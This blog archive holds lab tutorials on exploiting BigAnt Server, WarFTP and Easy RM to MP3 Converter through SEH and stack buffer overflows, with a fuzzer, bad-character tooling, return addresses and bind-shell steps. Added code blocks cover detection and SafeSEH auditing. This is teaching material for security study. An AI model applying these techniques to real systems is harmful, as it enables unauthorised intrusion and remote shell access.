Saturday, 29 September 2012

Bad Character

Bad characters can cause a variety of effects on the exploit we send. Sometimes they make a function fail or produce behaviour we did not expect, and they can even derail the whole exploitation process, as happened in the BigAnt SEH exploit case.
After we generated the payload with the bad characters defined as 0x00, 0x0a and 0x0d, we got code like this:

The result in the SEH handler view:
This is an unexpected result, because the result should be
Finding out which characters are bad characters requires a trial-and-error process. The method is to send a dummy data payload into memory, then look at which byte causes the SEH address to be read wrongly. The dummy characters are sent as opcodes from \x01 to \xFF, which covers all the opcodes the processor can receive. To make this easier we can use the generatecodes.pl script.
Here is the script:
#!/usr/bin/perl
# generatecodes.pl
# Version 0.1
#
# Prints every byte value from 0x00 to 0xff as a C-style "\xNN" string,
# leaving out the bytes already known to be bad, and breaks the output
# into quoted lines of $split bytes so each line can be tested on its own.

use strict;
use warnings;
use Getopt::Long;

my $help;
GetOptions('help' => \$help);
help() if $help;

# Parameter one: comma-separated hex bytes to leave out, e.g. 00,0a,0d
my @knownbad;
if ($ARGV[0]) {
    @knownbad = map { hex($_) } split ',', $ARGV[0];
}

# Parameter two: how many bytes per output line (default 15)
my $split = $ARGV[1] ? $ARGV[1] : 15;

my $count = 0;
for my $byte (0 .. 255) {
    # Skip bytes listed as known bad
    next if grep { $_ == $byte } @knownbad;

    print chr(34) if !$count;                  # opening double quote of a new line
    print '\x' . sprintf("%02x", $byte);
    $count++;

    # Close the line once $split bytes have been printed
    if ($count == $split) {
        print chr(34) . "\n";
        $count = 0;
    }
}

# Close a final, partially filled line
print chr(34) . "\n" if $count;

sub help {
    print "This script generates a C-style buffer of all characters from 0 to 255, except those specified in a comma-separated list provided as parameter one. Used to generate a list of characters to enter into an exploit to test for bad characters.\n\n" .
          "Parameter one is optional and should contain comma-separated hexadecimal bytes in the format 00,0a,0d; any characters provided will not be listed in the output.\n\n" .
          "Parameter two is also optional and specifies the interval at which new lines are interspersed in the output. If not specified the default is a new line every 15 characters.\n\n";
    exit;
}
  
Then run the script:
After this, the next step is to feed the script's output into the fuzzer, but this time one line at a time. The purpose of inserting it line by line is to find out which character (from \x00 to \xFF) makes the memory state go haywire.
The result goes straight into vbajet32.dll, which means there are no bad characters in the first line. Then we try the 2nd line...
"\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
and the result is that the address goes back to 90909090, which means there is at least one bad character in the 2nd line. We can narrow it down by splitting the line into two sections and testing each on the fuzzer until we know the bad character. OK... after more than 10 rounds of fuzzing and checking line by line, we get the result below:

So by manually putting in the dummy bytes line by line and testing them on our fuzzer, we can conclude that the bad characters in this case are 0x00, 0x0a, 0x0d and 0x20.
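The same trial-and-error loop can be written down as code, which makes it easier to see why the second line above failed. The block below is an added example and not code from the original post: it generates the same chunked test lines as generatecodes.pl, compares each chunk with what survived in memory, and keeps dropping and re-probing until a chunk arrives intact. The target is replaced by a constructed stand-in (`simulated_copy`) that behaves like a space-delimited command parser; with a real target the `probe` argument would return the bytes read out of the debugger.

```python
def test_bytes(known_bad, chunk=15):
    r"""Yield the byte values 0x00..0xff, minus the known bad ones, in chunks
    of `chunk` bytes: one chunk per line, just as generatecodes.pl prints."""
    skip = set(known_bad)
    remaining = [b for b in range(256) if b not in skip]
    for i in range(0, len(remaining), chunk):
        yield bytes(remaining[i:i + chunk])


def as_c_string(chunk):
    r"""Render one chunk as the Perl script does (a quoted run of \xNN escapes)."""
    return '"' + "".join("\\x%02x" % b for b in chunk) + '"'


def first_bad_byte(sent, observed):
    """Compare a chunk we sent with the bytes that actually landed in memory.
    Returns the first sent byte that was altered or that cut the copy short,
    or None when the whole chunk arrived intact."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_bad_bytes(known_bad, probe, chunk=15):
    """Drive the trial-and-error loop: push each chunk through `probe`, which
    returns what survived in memory, drop each offending byte and re-probe the
    shortened chunk until it arrives intact.  Returns every bad byte found,
    including the ones that were already known."""
    found = set(known_bad)
    for line in test_bytes(known_bad, chunk):
        bad = first_bad_byte(line, probe(line))
        while bad is not None:
            found.add(bad)
            line = bytes(x for x in line if x != bad)
            bad = first_bad_byte(line, probe(line))
    return sorted(found)


def simulated_copy(data):
    """Constructed stand-in for the vulnerable target (not BigAnt itself): a
    space-delimited command parser keeps only the bytes before the first 0x20,
    which is the kind of behaviour that turns 0x20 into a bad character."""
    return data.split(b" ")[0]


if __name__ == "__main__":
    for line in test_bytes([0x00, 0x0a, 0x0d]):
        print(as_c_string(line))
    print([hex(b) for b in find_bad_bytes([0x00, 0x0a, 0x0d], simulated_copy)])
```

Starting from 0x00, 0x0a and 0x0d the second test line is exactly the `\x12 ... \x20` string shown above, and the loop ends with 0x20 added to the list, matching the conclusion reached by hand.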

Exploitation Applications with SEH and SafeSEH

This time we discuss application exploitation with SEH and SafeSEH. One of the applications that uses SEH protection is BigAnt, so we can use it in our LAB. As before, we must prepare our tools:
1. Ollydbg
2. Python
3. BigAnt
4. LAB (Win XP SP3)

Now we come to the steps...
1. Prepare the LAB
Run BigAnt Server on our LAB and also run OllyDbg, then attach to the AntServer process.

2. Fuzzing
Create a fuzzer in Python; in this case we use the "USV " command of BigAnt Server.
Here is the code:
#!/usr/bin/python
import socket

target_address = "192.168.56.101"   # LAB machine running BigAnt Server
target_port = 6660                  # port BigAnt Server listens on

# "USV " command followed by 2500 bytes of 0x41 ("A") and the line terminators
buffer = b"USV " + b"\x41" * 2500 + b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

The code sends a 2500-byte buffer to BigAnt Server, which listens on port 6660. Run it, and we can see the result in OllyDbg:
The picture above shows how BigAnt crashes, but the EIP register is not overwritten; this happens because BigAnt uses SEH. If we want to see the error we can view the SEH chain.
To let the data from the SEH chain continue into memory we press Shift+F9.
Now we can see the EIP register overwritten with 0x41414141.
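Seen from the server side, the request the fuzzer sends is easy to tell apart from normal traffic, which is what a detection rule on the BigAnt port would key on. The block below is an added example and not code from the original post: it parses one command line as captured on TCP/6660 and flags an oversized argument, a single repeated filler byte, a Metasploit-style cyclic pattern or non-ASCII bytes. The threshold of 256 bytes, the sample lines and the shape of a legitimate `USV` argument are all assumptions made for the example.

```python
import re

# A run of Metasploit cyclic-pattern triples such as "Aa0Aa1Aa2" (upper, lower, digit)
CYCLIC = re.compile(rb"(?:[A-Z][a-z][0-9]){3,}")
NON_ASCII = re.compile(rb"[\x80-\xff]")


def inspect_command(line, max_arg=256):
    """Classify one BigAnt command line captured on the server port.

    Returns (verb, argument_length, reasons); `reasons` is empty for a
    normal-looking line.  `max_arg` is an assumed threshold for this example.
    """
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    reasons = []
    if len(arg) > max_arg:
        reasons.append("argument longer than %d bytes" % max_arg)
    if len(arg) >= 32 and len(set(arg)) == 1:
        reasons.append("argument is one repeated byte (overflow filler)")
    if CYCLIC.search(arg):
        reasons.append("argument contains a cyclic offset-finding pattern")
    if NON_ASCII.search(arg):
        reasons.append("argument contains non-ASCII bytes (possible shellcode)")
    return verb, len(arg), reasons


# Constructed sample traffic: a short, benign-looking command (argument format
# assumed), the fuzzer's 2500-byte "A" buffer, and a cyclic pattern probe.
SAMPLES = [
    b"USV 1.0\r\n\r\n",
    b"USV " + b"\x41" * 2500 + b"\r\n\r\n",
    b"USV Aa0Aa1Aa2Aa3Aa4Aa5\r\n\r\n",
]


def suspicious(samples=SAMPLES):
    """Return the inspection results for every sample that raised a reason."""
    results = [inspect_command(s) for s in samples]
    return [r for r in results if r[2]]


if __name__ == "__main__":
    for verb, length, reasons in suspicious():
        print(verb, length, "; ".join(reasons))
```

The repeated-byte and cyclic-pattern checks catch the two probes used in this post; the length check alone already covers the crash, since the server never needs anything close to 2500 bytes after `USV`.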

3. Pop, Pop, Retn method
The explanation of the POP, POP, RETN method and why we use it can be read in a book named "Harmless Hacking" by our lecturer Mr. MRP; in this post we don't discuss it and we skip past it.
Next, we use the third-party DLL file vbajet32.dll as a springboard to overwrite SEH protection. We can find a POP, POP, RETN sequence in the vbajet32.dll module in OllyDbg.
From OllyDbg -> View -> Executable modules -> open vbajet32.dll. Next, right-click and choose Search for -> Sequence of commands -> enter POP r32, POP r32, RETN. Finally we can see the address in vbajet32.dll:
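Whether a module such as vbajet32.dll was linked with /SAFESEH can be read straight from its PE headers rather than taken on trust from a debugger plugin. The block below is an added example, not code from the original post or from the BigAnt project: it decodes the load-configuration directory's SEHandlerTable and SEHandlerCount fields and the NO_SEH DLL characteristic, which is what the Windows loader consults before it accepts an exception handler. Field offsets follow the PE32 format; the two sample images are constructed inline, and for a real DLL you would pass `open(path, "rb").read()`. A defender runs this over every module an application loads to list the ones that leave the SEH-overwrite path open and need rebuilding.

```python
import struct

LOAD_CONFIG_INDEX = 10       # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
DLLCHAR_NO_SEH = 0x0400      # IMAGE_DLLCHARACTERISTICS_NO_SEH


def _sections(data, first, count):
    """(VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData) per section."""
    return [struct.unpack_from("<IIII", data, first + 40 * i + 8) for i in range(count)]


def rva_to_offset(rva, sections):
    """Translate an RVA to a file offset using the section table."""
    for vsize, va, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is not inside any section" % rva)


def safeseh_status(data):
    """Decode the SafeSEH state of a 32-bit PE image given as bytes.

    'safeseh' is True when the loader will only accept handlers it can
    verify: either the image forbids SEH outright (NO_SEH) or it ships a
    handler table (a present but empty table accepts no handler at all).
    """
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                            # optional header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images carry an SEH handler table")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    sections = _sections(data, opt + opt_size, nsections)

    status = {"no_seh": bool(dll_chars & DLLCHAR_NO_SEH),
              "handler_table": 0, "handler_count": 0}
    if ndirs > LOAD_CONFIG_INDEX:
        lc_rva, lc_size = struct.unpack_from("<II", data, opt + 96 + 8 * LOAD_CONFIG_INDEX)
        if lc_rva and lc_size >= 0x48:                       # fields at 0x40/0x44 must exist
            off = rva_to_offset(lc_rva, sections)
            status["handler_table"], status["handler_count"] = struct.unpack_from("<II", data, off + 0x40)
    status["safeseh"] = status["no_seh"] or status["handler_table"] != 0
    return status


def build_sample_pe(handler_count):
    """Constructed minimal PE32 with one section holding a load-config directory.
    handler_count == 0 yields an image linked without /SAFESEH (no handler
    table), which is how old third-party DLLs typically look."""
    sec_rva, sec_raw = 0x1000, 0x200
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_INDEX, sec_rva, 0x48)
    sec = b".rdata\0\0" + struct.pack("<IIII", 0x100, sec_rva, 0x200, sec_raw) + b"\0" * 16
    load_cfg = bytearray(0x48)
    struct.pack_into("<I", load_cfg, 0, 0x48)                            # Size
    table_rva = sec_rva + 0x100 if handler_count else 0
    struct.pack_into("<II", load_cfg, 0x40, table_rva, handler_count)
    headers = (dos + coff + bytes(opt) + sec).ljust(sec_raw, b"\0")
    return headers + bytes(load_cfg).ljust(0x200, b"\0")


if __name__ == "__main__":
    print("linked with /SAFESEH   :", safeseh_status(build_sample_pe(3)))
    print("linked without /SAFESEH:", safeseh_status(build_sample_pe(0)))
```

A module that reports `safeseh: False` is one whose handler addresses the loader cannot validate, so a POP, POP, RETN sequence inside it would be accepted as an exception handler; that is the gap a rebuild with /SAFESEH closes.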

4. Create an offset pattern
As in the step for exploiting WarFTP, the next step is to create a pattern, copy the pattern into the fuzzer and then run the fuzzer:
Now, from the resulting offset, we know how many bytes of data we must send to the target.
Next, still in the same fuzzer, we make the following change:

Then run the fuzzer again. The result should be that BigAnt crashes and an access violation occurs in memory, which we can see in the SEH handler.

5. CPU process control
After we get the bytes that reach the SEH address, it is time to put the address in vbajet32.dll that holds the POP, POP, RETN sequence into the fuzzer. The code looks like this:

Restart OllyDbg and BigAnt Server, put a breakpoint at memory address 0F9A196A inside the vbajet32.dll module, then run the fuzzer.
Now we can see this change in the SEH handler:


To direct the CPU from those 4 bytes into the empty space that follows the SEH overwrite address, we can use the JMP SHORT command. So we write a 6-byte opcode value into the fuzzer, and the change looks like this:

6. Generate shellcode
We can use msfweb just as we did to exploit WarFTP; the most important thing is that we must pay attention to the "BAD characters". I will post the way to find bad chars in a different post.

Next, we copy the code generated for the payload into the fuzzer, adding 16 bytes of NOP padding before it.
The last step is to run the fuzzer against the target and then try to connect to the system.
Finally done...

Friday, 28 September 2012

Non SEH Vulnerability Development II (Local)

In my last post about Non-SEH VD using a remote shellcode, we used the WarFTP application as the target. Now we try Easy RM to MP3 Converter as a target for a local shellcode.
The preparation is basically the same as before, so we can go straight to the steps.

1. Fuzzing
Create a fuzzer in Python that generates a file able to crash (buffer overflow) Easy RM (ERM).

Run the fuzzer, and the result should be a file named coba.m3u (an MP3 playlist). Open coba.m3u in Easy RM on the LAB; what happens next is that ERM crashes and suddenly closes.

2. Debugger
Check in OllyDbg, and make sure that the EIP register is overwritten with 0x41414141.
3. Byte position using MSF
Run the pattern_create tool with the command:

root@bt:/opt/metasploit-4.3.0/msf3/tools# ./pattern_create.rb 26100 > erm.txt

and copy the output into the fuzzer.

OllyDbg shows:

Run the pattern_offset tool,
edit the fuzzer:
and after running it on ERM it shows:

4. JMP ESP
Find the address of a JMP ESP instruction in shell32.dll and then set the fuzzer:
After the breakpoint, OllyDbg shows:

5. Generate the payload and add the NOP sled
Use the same payload method (bind shell) for Windows and generate the payload code, then copy the code into the fuzzer.

Run the fuzzer, then open the latest coba.m3u in Easy RM Converter without OllyDbg. The last step is to connect to the target IP on port 4444, and the result should be:

...and done. Happy trying ^^...

Non SEH Vulnerability Development

Today we try to learn about Non-SEH, or what most people call buffer overflow, vulnerability development. The application used as the target is WarFTP running on Windows XP SP3.

Tools we need to prepare:
1. WarFTP 1.65
2. Lab (Windows XP SP3 running on VirtualBox)
3. Ollydbg
4. Python

Steps:
1. Fuzzing
Fuzzing is the first step we take to find vulnerabilities that can be exploited in applications. So now we make a simple fuzzer that can transmit data over the FTP protocol (remote), using the Python programming language.

2. Connect with the target
Don't forget to run WarFTP on your VirtualBox, because it's our target application LOL...
After that, we run the fuzzer against the target using the command:
root@bt:~# python fuzzer.py
Then WarFTP on the LAB should disappear or show an error. That means our fuzzer works.

3. Debugger
The next step is to look at the application's memory using OllyDbg. Run WarFTP through OllyDbg,

then run the fuzzer again and look at the difference in the CPU registers.
We can see all the CPU registers affected by the AAAA... (0x41414141) we sent from the fuzzer. With that value stacked into the EIP register, an attacker has the opportunity to control the EIP register and change it as needed.

4. Fuzzer byte position using Metasploit Framework
Usually we use the pattern_create tool to make a unique string that replaces the "A" characters sent to the application.

root@bt:/opt/metasploit-4.3.0/msf3/tools# ./pattern_create.rb 1000 > string_pattern.txt

Copy the contents of string_pattern.txt into the fuzzer,
run the fuzzer against the application again and look at what OllyDbg shows.

See the ESP and EIP values, and then find the byte position using the pattern_offset tool.
It returns 485 for the EIP offset and 493 for the ESP offset, which shows that we need 4 bytes to overwrite the EIP register. Next we overwrite the EIP register with DEADBEEF.
Run the fuzzer again,
now the EIP register is overwritten with the DEADBEEF address.
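The pattern_create / pattern_offset steps used here, for BigAnt and for Easy RM rely on one property of the pattern: every 4-byte window of it is unique, so a register value maps back to exactly one offset. The block below is an added example, not code from the original post or from the Metasploit project; it builds the same `Aa0Aa1Aa2...` sequence that pattern_create.rb produces and looks a value up the way pattern_offset.rb does, accepting either the raw bytes or the little-endian integer OllyDbg displays. The values at offsets 485 and 493 are taken from the generated pattern to demonstrate the lookup; the actual EIP/ESP contents from the WarFTP crash are not on this page.

```python
import string
import struct


def pattern_create(length):
    """Build the cyclic pattern (Aa0Aa1Aa2 ...) of the given length.

    Triples cycle upper letter, lower letter, digit; within the first
    26 * 26 * 10 * 3 = 20280 bytes no 4-byte window repeats, so any 4 bytes
    found in a register identify one position in the buffer.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=1000):
    """Return the offset of a 4-byte register value inside the pattern, or -1.

    `value` may be the bytes as they sat in the buffer (b"Aa5A"), the integer
    shown by the debugger (0x41356141) or that integer as a hex string; an
    integer is repacked little-endian to recover the original byte order.
    """
    if isinstance(value, str):
        value = int(value, 16)
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return pattern_create(length).find(value)


if __name__ == "__main__":
    buf = pattern_create(1000)                     # same length as the post uses
    eip_seen = int.from_bytes(buf[485:489], "little")  # constructed: what EIP would hold
    esp_seen = int.from_bytes(buf[493:497], "little")  # constructed: first bytes at ESP
    print("EIP 0x%08x -> offset %d" % (eip_seen, pattern_offset(eip_seen)))
    print("ESP 0x%08x -> offset %d" % (esp_seen, pattern_offset(esp_seen)))
```

Because the EIP offset is 485 and the ESP offset is 493, the bytes at 485..488 are the 4 that land in EIP and the data at ESP starts 8 bytes later, which is the layout the JMP ESP step below depends on.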

5. JMP ESP
The next strategy is to use JMP ESP. JMP ESP is an instruction that makes the CPU continue executing at the data in the buffer that ESP points to, so the value of the EIP register must point to a memory address that contains a JMP ESP instruction. What we have to do now is find a JMP ESP instruction in the Shell32.dll file using OllyDbg.
Change the DEADBEEF address in the fuzzer to the JMP ESP address 7C9D30F3, then run the fuzzer again, and it looks like this:

6. Generate payload
Run these commands from the console,
run the browser,

generate the payload from the browser and copy the code into the fuzzer, so the latest fuzzer looks like this:

Then run WarFTP again without OllyDbg and run the fuzzer.

After we connect with netcat to the target IP on port 4444, we have penetrated the system. ^^
Monday, 24 September 2012

Installing Metasploit Community Edition on BackTrack 5 R1


BackTrack 5 R1 comes pre-installed with Metasploit Framework 4.0. Unfortunately, Metasploit Community, which brings a great new Web UI and other functionality, was introduced in version 4.1, so it's not included by default. Updating Metasploit Framework using the msfupdate command will not install the Web UI. In addition, BT5 only makes the development trunk available, not the stable trunk (read about the difference). This post tells you how you can update your version of BackTrack5 to Metasploit Community, including both the stable and the dev trunk of Metasploit Framework. If you want to use Metasploit Express or Metasploit Pro on BackTrack5, follow the same instructions and enter your product key at the end to activate your commercial Metasploit edition.

Installing Metasploit Community over the existing Metasploit Framework installation won't work for several reasons, one being a conflict with the postgres database. The best way is to start by uninstalling Metasploit Framework v3 first. After logging on to BT5 (user: root / password: toor), use the following command to uninstall the software:

/opt/framework/uninstall
After the uninstall has completed, enter the BackTrack GUI with the following command:

startx

Open Firefox (menu Applications / Internet / Firefox Web Browser), go to http://metasploit.com/download and download the Linux installer. When the download has completed, open a terminal window and enter the following commands:

chmod u+x /root/metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run

At the end of the installer, the Metasploit Web UI opens in Firefox (hint: it's opened behind your terminal window). Since the Metasploit UI uses a user-generated, unsigned SSL certificate, Firefox complains that the connection is untrusted. Click on I understand the risks, Add Exception..., and Confirm Security Exception.

By default, Javascript is disabled in the Firefox BackTrack installation. You should enable Javascript for https://localhost first. To do this, click on Options... on the bottom right of your screen, and select Allow https://localhost. 
Enter a username and password, and click Create Account. Click on Register your Metasploit license here!

Firefox on BackTrack is very restrictive with Javascript and redirects, so the registration process is more cumbersome than with a standard Firefox installation. The registration page is hosted on Rapid7.com, leverages several background services to generate the product key, and requires Javascript. Here is what you need to do to register the license.

  1. Click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  2. Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  3. Enter your email address and hit Go.
  4. Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  5. Hit Go again.
  6. You'll see a redirect warning that starts with "Request". Simply ignore it.
  7. Close the tab. You should now be back in the Metasploit Web UI.
Within 5 minutes of completing the form, you'll receive an email with a product key. Copy it to the Product Key field, then click Activate License. You should now see this success message:

 
The BackTrack folks just published that you can now get the new unified Metasploit installer with a dist-upgrade operation or through apt-get. The open source Metasploit trunk is still present under /opt/metasploit/msf3/.
Done... Good luck and try.
"The quieter you are, the more you are able to hear"